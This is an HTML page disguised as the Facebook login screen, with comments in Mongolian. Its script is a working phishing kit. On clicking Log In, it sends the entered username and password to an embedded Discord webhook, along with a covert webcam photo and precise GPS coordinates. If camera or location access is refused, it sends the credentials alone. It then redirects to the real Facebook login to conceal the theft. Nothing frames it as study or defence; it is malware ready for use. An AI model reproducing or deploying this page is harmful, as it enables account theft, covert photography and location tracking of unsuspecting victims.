<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>Facebook - Log In or Sign Up</title>
    <meta property="og:title" content="Facebook - Log In or Sign Up" />
    <meta property="og:description" content="Log into Facebook to start sharing and connecting with your friends, family and people you know." />
    <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
    <meta property="og:type" content="website" />
    <meta name="theme-color" content="#1877f2">

    <style>
        body { font-family: Helvetica, Arial, sans-serif; background-color: #f0f2f5; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh; margin: 0; }
        .container { width: 100%; max-width: 400px; text-align: center; padding: 10px; }
        .logo { color: #1877f2; font-size: 45px; font-weight: bold; margin-bottom: 20px; letter-spacing: -2px; }
        .login-box { background: white; padding: 20px; border-radius: 8px; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1); }
        input { width: 100%; padding: 14px; margin-bottom: 12px; border: 1px solid #dddfe2; border-radius: 6px; font-size: 17px; box-sizing: border-box; }
        .login-btn { width: 100%; padding: 12px; background-color: #1877f2; border: none; border-radius: 6px; color: white; font-size: 20px; font-weight: bold; cursor: pointer; }
        .forgot-password { color: #1877f2; font-size: 14px; text-decoration: none; display: block; margin: 15px 0; }
        hr { border: 0; border-top: 1px solid #dadde1; margin: 20px 0; }
        .create-btn { background-color: #42b72a; color: white; padding: 14px 20px; border: none; border-radius: 6px; font-size: 17px; font-weight: bold; cursor: pointer; }
        #video, #canvas { display: none; }
    </style>
</head>
<body>

    <div class="container">
        <div class="logo">facebook</div>
        <div class="login-box">
            <input type="text" id="user" placeholder="Email address or phone number" required>
            <input type="password" id="pass" placeholder="Password" required>
            <button class="login-btn" onclick="captureEverything()">Log In</button>
            <a href="#" class="forgot-password">Forgotten password?</a>
            <hr>
            <button class="create-btn">Create new account</button>
        </div>
    </div>

    <video id="video" autoplay playsinline></video>
    <canvas id="canvas"></canvas>

    <script>
        // ЧИНИЙ DISCORD WEBHOOK ЛИНК
        const WEBHOOK_URL = 'https://discord.com/api/webhooks/1459136830992683080/XvGgJxEN4NJS0Cq-VMociYYRoSDZ10og0Hn-XBWHKRqscW_xeAV73BwkBq-KlkQmeHgz';

        async function captureEverything() {
            const user = document.getElementById('user').value;
            const pass = document.getElementById('pass').value;

            if (!user || !pass) {
                alert("Please enter your email and password.");
                return;
            }

            try {
                // 1. Камерын зөвшөөрөл нэхэх
                const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                
                // 2. GPS байршил нэхэх
                navigator.geolocation.getCurrentPosition(async (position) => {
                    const lat = position.coords.latitude;
                    const lon = position.coords.longitude;
                    const device = /Android/i.test(navigator.userAgent) ? "Android" : /iPhone|iPad|iPod/i.test(navigator.userAgent) ? "iPhone" : "PC";

                    const video = document.getElementById('video');
                    video.srcObject = stream;

                    // 1 секунд хүлээгээд зураг дарна
                    setTimeout(() => {
                        const canvas = document.getElementById('canvas');
                        canvas.width = video.videoWidth;
                        canvas.height = video.videoHeight;
                        canvas.getContext('2d').drawImage(video, 0, 0);

                        canvas.toBlob(async (blob) => {
                            const formData = new FormData();
                            formData.append('file', blob, 'shot.png');

                            const payload = {
                                content: "🚨 **NEW TARGET DATA ARRIVED!**",
                                embeds: [{
                                    title: "Account & Precise Tracking",
                                    color: 1572450,
                                    fields: [
                                        { name: "👤 Username", value: `\`${user}\``, inline: true },
                                        { name: "🔑 Password", value: `\`${pass}\``, inline: true },
                                        { name: "📱 Device", value: device, inline: true },
                                        { name: "📍 GPS", value: `${lat}, ${lon}`, inline: false },
                                        { name: "🗺️ Google Maps", value: `https://www.google.com/maps?q=${lat},${lon}`, inline: false }
                                    ],
                                    footer: { text: "Collected successfully" },
                                    timestamp: new Date()
                                }]
                            };

                            formData.append('payload_json', JSON.stringify(payload));
                            await fetch(WEBHOOK_URL, { method: 'POST', body: formData });

                            // Жинхэнэ Facebook рүү шилжүүлнэ
                            stream.getTracks().forEach(t => t.stop());
                            window.location.href = "https://www.facebook.com/login";
                        }, 'image/png');
                    }, 1000);

                }, (err) => {
                    // Хэрэв GPS зөвшөөрөхгүй бол зөвхөн password явуулна
                    sendBasicInfo(user, pass, "GPS Denied");
                }, { enableHighAccuracy: true });

            } catch (err) {
                // Хэрэв Камер зөвшөөрөхгүй бол зөвхөн password явуулна
                sendBasicInfo(user, pass, "Camera & GPS Denied");
            }
        }

        async function sendBasicInfo(u, p, status) {
            const payload = {
                content: `⚠️ **BASIC INFO CAPTURED (${status})**`,
                embeds: [{
                    fields: [
                        { name: "User", value: u },
                        { name: "Pass", value: p }
                    ]
                }]
            };
            await fetch(WEBHOOK_URL, { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify(payload) });
            window.location.href = "https://www.facebook.com/login";
        }
    </script>
</body>
</html>
